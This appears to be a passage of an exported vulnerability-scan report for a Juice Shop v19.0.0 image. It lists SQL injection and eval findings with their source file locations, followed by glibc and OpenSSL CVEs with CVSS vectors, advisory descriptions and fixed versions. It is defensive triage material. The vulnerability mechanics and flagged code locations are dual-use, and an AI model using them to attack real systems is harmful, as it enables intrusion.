+ Finding 14: +javascript.sequelize.security.audit.sequelize-injection-express.express- +sequelize-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
34
+ + + + + + + +
File Path
/src/routes/login.ts
+
+
+
+ + + + + +
Description
+

Result message: + Detected a sequelize statement that is tainted by user-input. This +could lead to SQL injection if the variable is user-controlled and is +not properly sanitized. In order to prevent SQL injection, it is +recommended to use parameterized queries or prepared statements.

+ + + + + + + + + + + + +
References
+

https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements

+ + + + + + + +
+
+
+
+ Finding 18: +javascript.sequelize.security.audit.sequelize-injection-express.express- +sequelize-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
23
+ + + + + + + +
File Path
/src/routes/search.ts
+
+
+
+ + + + + +
Description
+

Result message: + Detected a sequelize statement that is tainted by user-input. This +could lead to SQL injection if the variable is user-controlled and is +not properly sanitized. In order to prevent SQL injection, it is +recommended to use parameterized queries or prepared statements.

+ + + + + + + + + + + + +
References
+

https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements

+ + + + + + + +
+
+
+
+ Finding 19: javascript.lang.security.audit.code-string-concat.code-string-concat + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 95 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
62
+ + + + + + + +
File Path
/src/routes/userProfile.ts
+
+
+
+ + + + + +
Description
+

Result message: Found data from an Express or Next web request flowing to eval. + If this data is user-controllable this can lead to execution of +arbitrary system commands in the context of your application process. +Avoid eval whenever possible.

+ + + + + + + + + + + + +
References
+

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval
+https://nodejs.org/api/child_process.html#child_processexeccommand-options-callback
+https://www.stackhawk.com/blog/nodejs-command-injection-examples-and-prevention/
+https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_server_side_js_injection.html

+ + + + + + + +
+
+
+
+ Finding 28: CVE-2025-4802 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 426 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

+ + +
Description
+

glibc: static setuid binary dlopen may incorrectly search LD_LIBRARY_PATH
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 2.36-9+deb12u11

+

Untrusted LD_LIBRARY_PATH environment variable vulnerability in the +GNU C Library version 2.27 to 2.38 allows attacker controlled loading of + dynamically shared library in statically compiled setuid binaries that +call dlopen (including internal dlopen calls after setlocale or calls to + NSS functions such as getaddrinfo).

+ + +
Mitigation
+

2.36-9+deb12u11

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2025/05/16/7
+http://www.openwall.com/lists/oss-security/2025/05/17/2
+https://access.redhat.com/errata/RHSA-2025:8655
+https://access.redhat.com/security/cve/CVE-2025-4802
+https://bugzilla.redhat.com/2367468
+https://bugzilla.redhat.com/show_bug.cgi?id=2367468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4802
+https://errata.almalinux.org/9/ALSA-2025-8655.html
+https://errata.rockylinux.org/RLSA-2025:8655
+https://inbox.sourceware.org/libc-announce/3ac997b0-28a5-4129-af53-675efe4c2dec@redhat.com/T/#u
+https://linux.oracle.com/cve/CVE-2025-4802.html
+https://linux.oracle.com/errata/ELSA-2025-8686.html
+https://lists.debian.org/debian-lts-announce/2025/05/msg00033.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-4802
+https://sourceware.org/bugzilla/show_bug.cgi?id=32976
+https://sourceware.org/cgit/glibc/commit/?id=1e18586c5820e329f741d5c710275e165581380e
+https://sourceware.org/cgit/glibc/commit/?id=5451fa962cd0a90a0e2ec1d8910a559ace02bba0
+https://ubuntu.com/security/notices/USN-7541-1
+https://www.cve.org/CVERecord?id=CVE-2025-4802
+https://www.openwall.com/lists/oss-security/2025/05/16/7
+https://www.openwall.com/lists/oss-security/2025/05/17/2

+ + + + + + + +
+
+
+
+ Finding 29: CVE-2026-0861 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 190 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

glibc: Integer overflow in memalign leads to heap corruption
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Passing too large an alignment to the memalign suite of functions +(memalign, posix_memalign, aligned_alloc) in the GNU C Library version +2.30 to 2.42 may result in an integer overflow, which could consequently + result in a heap corruption.

+

Note that the attacker must have control over both, the size as well +as the alignment arguments of the memalign function to be able to +exploit this. The size parameter must be close enough to PTRDIFF_MAX so + as to overflow size_t along with the large alignment argument. This +limits the malicious inputs for the alignment for memalign to the range +[1<<62+ 1, 1<<63] and exactly 1<<63 for posix_memalign + and aligned_alloc.

+

Typically the alignment argument passed to such functions is a known +constrained quantity (e.g. page size, block size, struct sizes) and is +not attacker controlled, because of which this may not be easily +exploitable in practice. An application bug could potentially result in + the input alignment being too large, e.g. due to a different buffer +overflow or integer overflow in the application or its dependent +libraries, but that is again an uncommon usage pattern given typical +sources of alignments.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2026/01/16/5
+https://access.redhat.com/errata/RHSA-2026:2786
+https://access.redhat.com/security/cve/CVE-2026-0861
+https://bugzilla.redhat.com/2429771
+https://bugzilla.redhat.com/2430201
+https://bugzilla.redhat.com/2431196
+https://bugzilla.redhat.com/show_bug.cgi?id=2429771
+https://bugzilla.redhat.com/show_bug.cgi?id=2430201
+https://bugzilla.redhat.com/show_bug.cgi?id=2431196
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15281
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0861
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0915
+https://errata.almalinux.org/9/ALSA-2026-2786.html
+https://errata.rockylinux.org/RLSA-2026:2786
+https://linux.oracle.com/cve/CVE-2026-0861.html
+https://linux.oracle.com/errata/ELSA-2026-50120.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-0861
+https://sourceware.org/bugzilla/show_bug.cgi?id=33796
+https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0001
+https://ubuntu.com/security/notices/USN-8005-1
+https://www.cve.org/CVERecord?id=CVE-2026-0861

+ + + + + + + +
+
+
+
+ Finding 51: CVE-2025-69419 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 787 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

+ + +
Description
+

openssl: OpenSSL: Arbitrary code execution due to out-of-bounds write in PKCS#12 processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: Calling PKCS12_get_friendlyname() function on a maliciously
+crafted PKCS#12 file with a BMPString (UTF-16BE) friendly name containing
+non-ASCII BMP code point can trigger a one byte write before the allocated
+buffer.

+

Impact summary: The out-of-bounds write can cause a memory corruption
+which can have various consequences including a Denial of Service.

+

The OPENSSL_uni2utf8() function performs a two-pass conversion of a PKCS#12
+BMPString (UTF-16BE) to UTF-8. In the second pass, when emitting UTF-8 bytes,
+the helper function bmp_to_utf8() incorrectly forwards the remaining UTF-16
+source byte count as the destination buffer capacity to UTF8_putc(). For BMP
+code points above U+07FF, UTF-8 requires three bytes, but the forwarded
+capacity can be just two bytes. UTF8_putc() then returns -1, and this negative
+value is added to the output length without validation, causing the
+length to become negative. The subsequent trailing NUL byte is then written
+at a negative offset, causing write outside of heap allocated buffer.

+

The vulnerability is reachable via the public PKCS12_get_friendlyname() API
+when parsing attacker-controlled PKCS#12 files. While PKCS12_parse() uses a
+different code path that avoids this issue, PKCS12_get_friendlyname() directly
+invokes the vulnerable function. Exploitation requires an attacker to provide
+a malicious PKCS#12 file to be parsed by the application and the attacker
+can just trigger a one zero byte write before the allocated buffer.
+For that reason the issue was assessed as Low severity according to our
+Security Policy.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.

+

OpenSSL 1.0.2 is not affected by this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:4472
+https://access.redhat.com/security/cve/CVE-2025-69419
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-4472.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-x77r-97gw-wh89
+https://github.com/openssl/openssl/commit/41be0f216404f14457bbf3b9cc488dba60b49296
+https://github.com/openssl/openssl/commit/7e9cac9832e4705b91987c2474ed06a37a93cecb
+https://github.com/openssl/openssl/commit/a26a90d38edec3748566129d824e664b54bee2e2
+https://github.com/openssl/openssl/commit/cda12de3bc0e333ea8d2c6fd15001dbdaf280015
+https://github.com/openssl/openssl/commit/ff628933755075446bca8307e8417c14d164b535
+https://linux.oracle.com/cve/CVE-2025-69419.html
+https://linux.oracle.com/errata/ELSA-2026-50131.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-69419
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2025-69419

+ + + + + + + +
+
+
+
+ Finding 52: CVE-2025-69421 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 476 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service via malformed PKCS#12 file processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer
+dereference in the PKCS12_item_decrypt_d2i_ex() function.

+

Impact summary: A NULL pointer dereference can trigger a crash which leads to
+Denial of Service for an application processing PKCS#12 files.

+

The PKCS12_item_decrypt_d2i_ex() function does not check whether the oct
+parameter is NULL before dereferencing it. When called from
+PKCS12_unpack_p7encdata() with a malformed PKCS#12 file, this parameter can
+be NULL, causing a crash. The vulnerability is limited to Denial of Service
+and cannot be escalated to achieve code execution or memory disclosure.

+

Exploiting this issue requires an attacker to provide a malformed PKCS#12 file
+to an application that processes it. For that reason the issue was assessed as
+Low severity according to our Security Policy.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2025-69421
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-w9rv-xc8m-cmqp
+https://github.com/openssl/openssl/commit/3524a29271f8191b8fd8a5257eb05173982a097b
+https://github.com/openssl/openssl/commit/36ecb4960872a4ce04bf6f1e1f4e78d75ec0c0c7
+https://github.com/openssl/openssl/commit/4bbc8d41a72c842ce4077a8a3eccd1109aaf74bd
+https://github.com/openssl/openssl/commit/643986985cd1c21221f941129d76fe0c2785aeb3
+https://github.com/openssl/openssl/commit/a2dbc539f0f9cc63832709fa5aa33ad9495eb19c
+https://linux.oracle.com/cve/CVE-2025-69421.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-69421
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2025-69421

+ + + + + + + +
+
+
+
+ Finding 53: CVE-2026-28387 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 416 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

openssl: OpenSSL: Arbitrary code execution due to use-after-free in DANE TLSA authentication
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.19-1~deb12u2

+

Issue summary: An uncommon configuration of clients performing DANE TLSA-based
+server authentication, when paired with uncommon server DANE TLSA records, may
+result in a use-after-free and/or double-free on the client side.

+

Impact summary: A use after free can have a range of potential consequences
+such as the corruption of valid data, crashes or execution of arbitrary code.

+

However, the issue only affects clients that make use of TLSA records with both
+the PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate
+usage.

+

By far the most common deployment of DANE is in SMTP MTAs for which RFC7672
+recommends that clients treat as 'unusable' any TLSA records that have the PKIX
+certificate usages. These SMTP (or other similar) clients are not vulnerable
+to this issue. Conversely, any clients that support only the PKIX usages, and
+ignore the DANE-TA(2) usage are also not vulnerable.

+

The client would also need to be communicating with a server that publishes a
+TLSA RRset with both types of TLSA records.

+

No FIPS modules are affected by this issue, the problem code is outside the
+FIPS module boundary.

+ + +
Mitigation
+

3.0.19-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-28387
+https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b
+https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe
+https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3
+https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7
+https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177
+https://nvd.nist.gov/vuln/detail/CVE-2026-28387
+https://openssl-library.org/news/secadv/20260407.txt
+https://ubuntu.com/security/notices/USN-8155-1
+https://ubuntu.com/security/notices/USN-8155-2
+https://www.cve.org/CVERecord?id=CVE-2026-28387
+https://www.openwall.com/lists/oss-security/2026/04/07/11

+ + + + + + + +
+
+
+
+ Finding 54: CVE-2026-28388 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 476 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service due to NULL pointer dereference in delta CRL processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.19-1~deb12u2

+

Issue summary: When a delta CRL that contains a Delta CRL Indicator extension
+is processed a NULL pointer dereference might happen if the required CRL
+Number extension is missing.

+

Impact summary: A NULL pointer dereference can trigger a crash which
+leads to a Denial of Service for an application.

+

When CRL processing and delta CRL processing is enabled during X.509
+certificate verification, the delta CRL processing does not check
+whether the CRL Number extension is NULL before dereferencing it.
+When a malformed delta CRL file is being processed, this parameter
+can be NULL, causing a NULL pointer dereference.

+

Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in
+the verification context, the certificate being verified to contain a
+freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and
+an attacker to provide a malformed CRL to an application that processes it.

+

The vulnerability is limited to Denial of Service and cannot be escalated to
+achieve code execution or memory disclosure. For that reason the issue was
+assessed as Low severity according to our Security Policy.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the affected code is outside the OpenSSL FIPS module boundary.

+ + +
Mitigation
+

3.0.19-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-28388
+https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e
+https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139
+https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3
+https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8
+https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726
+https://nvd.nist.gov/vuln/detail/CVE-2026-28388
+https://openssl-library.org/news/secadv/20260407.txt
+https://ubuntu.com/security/notices/USN-8155-1
+https://ubuntu.com/security/notices/USN-8155-2
+https://www.cve.org/CVERecord?id=CVE-2026-28388
+https://www.openwall.com/lists/oss-security/2026/04/07/11

+ + + + + + + +
+
+
+
+ Finding 55: CVE-2026-28389 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 476 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service vulnerability in CMS processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.19-1~deb12u2

+

Issue summary: During processing of a crafted CMS EnvelopedData message
+with KeyAgreeRecipientInfo a NULL pointer dereference can happen.

+

Impact summary: Applications that process attacker-controlled CMS data may
+crash before authentication or cryptographic operations occur resulting in
+Denial of Service.

+

When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is
+processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier
+is examined without checking for its presence. This results in a NULL
+pointer dereference if the field is missing.

+

Applications and services that call CMS_decrypt() on untrusted input
+(e.g., S/MIME processing or CMS-based protocols) are vulnerable.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this
+issue, as the affected code is outside the OpenSSL FIPS module boundary.

+ + +
Mitigation
+

3.0.19-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-28389
+https://github.com/advisories/GHSA-7x88-9hgc-69gf
+https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5
+https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616
+https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f
+https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a
+https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686
+https://nvd.nist.gov/vuln/detail/CVE-2026-28389
+https://openssl-library.org/news/secadv/20260407.txt
+https://ubuntu.com/security/notices/USN-8155-1
+https://ubuntu.com/security/notices/USN-8155-2
+https://www.cve.org/CVERecord?id=CVE-2026-28389
+https://www.openwall.com/lists/oss-security/2026/04/07/11

+ + + + + + + +
+
+
+
+ Finding 56: CVE-2026-28390 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 476 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service due to NULL pointer dereference in CMS EnvelopedData processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.19-1~deb12u2

+

Issue summary: During processing of a crafted CMS EnvelopedData message
+with KeyTransportRecipientInfo a NULL pointer dereference can happen.

+

Impact summary: Applications that process attacker-controlled CMS data may
+crash before authentication or cryptographic operations occur resulting in
+Denial of Service.

+

When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with
+RSA-OAEP encryption is processed, the optional parameters field of
+RSA-OAEP SourceFunc algorithm identifier is examined without checking
+for its presence. This results in a NULL pointer dereference if the field
+is missing.

+

Applications and services that call CMS_decrypt() on untrusted input
+(e.g., S/MIME processing or CMS-based protocols) are vulnerable.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this
+issue, as the affected code is outside the OpenSSL FIPS module boundary.

+ + +
Mitigation
+

3.0.19-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-28390
+https://github.com/openssl/openssl/commit/01194a8f1941115cd0383bfa91c736dd3993c8bc
+https://github.com/openssl/openssl/commit/2e39b7a6993be445fddb9fbce316fa756e0397b6
+https://github.com/openssl/openssl/commit/af2a5fecd3e71a29e7568f9c1453dec5cebbaff4
+https://github.com/openssl/openssl/commit/ea7b4ea4f9f853521ba34830cbcadc970d2e0788
+https://github.com/openssl/openssl/commit/fd2f1a6cf53b9ceeca723a001aa4b825d7c7ee75
+https://nvd.nist.gov/vuln/detail/CVE-2026-28390
+https://openssl-library.org/news/secadv/20260407.txt
+https://ubuntu.com/security/notices/USN-8155-1
